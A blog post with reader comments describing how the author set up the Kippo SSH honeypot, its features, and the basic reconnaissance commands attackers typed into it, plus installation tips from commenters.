Thanks to Lukas Rist’s suggestion I found Kippo SSH Honeypot. Kippo is developed by Upi Tamminen and according to the project’s homepage, “Kippo is inspired, but not based on Kojoney.”, so I decided to give it a try.
Kippo setup and installation is quite simple. You only have to download it, uncompress it, edit the kippo.cfg file (I changed the hostname) and run it with ./start.sh
Kippo has great features. It emulates a Debian 5.0 filesystem, implements interesting shell commands and it allows the attacker to download files with wget, but what I really love is that it records the attacker session in a way that you can play it back later to analyze it. If anyone is interested, I can upload the session logs.
Updated: Please read mig5′s comments for this post for more great information and impressions about Kippo!
My honeypot has recorded three long sessions and these are the most frequent commands used by the attackers:
- Implemented by Kippo: w, ls, cd, uptime, cat /proc/cpuinfo, uname -a, passwd (but it shows that passwords mismatch
), wget… - Not implemented by Kippo: cat /etc/issue, cat /proc/version, adduser…
So far the attackers have downloaded three files that I will examine in the following days but a quick inspection shows that one of the files contains a kit to convert a host into a Flood bot. It seems promising.
I really recommend you this honeypot if you want a didactic tool.
Have fun!
Very nice find! Look forward to adding this to my own research environment.
Keep up the good work with the blog, look forward to seeing more results!
Nice,
I highly recommend installing the very bleeding edge from the svn repo. It has support for logging to mysql, which is much easier than reading logs, and a bunch of other cool new features.
Note that you have to copy the kippo.cfg.dist file to kippo.cfg before Kippo will start successfully, and that it starts on port 2222 (unprivileged port), so some iptables REDIRECT may be needed if you want to expose the honeypot to the traditional port 22.
P.S for Debian users, an
apt-get install python-twistedis probably enough to grab all the relevant dependencies.Thanks for the tip-off on this excellent honeypot!
Discovering the project has also led me to stumble upon #honeypots on irc.freenode.net – I’ll maybe see you guys there as I tend to idle in IRC most of the time.
Thanks a lot for your comments they are great for people looking for info about kippo, and thanks for read my posts!
[...] I hadn’t found time to implement the system in a live environment, but a recent post on the Diatel blog suggested that installation may be quick and pain [...]
Hi doncicuto, I don’t know if you’re still actively monitor your Kippo honeypot(s), but fyi I’m writing a tool to visualize the logs called Kippo-Graph. You might want to check it out, link: http://ikoniari.webpages.auth.gr/kippo-graph
Hi Ion,
. The features and screenshots at your blog look great so thanks in advance for your work and for letting me know about Kippo-Graph. Happy 2012!
I’ll install your tool as soon I’m back from my holidays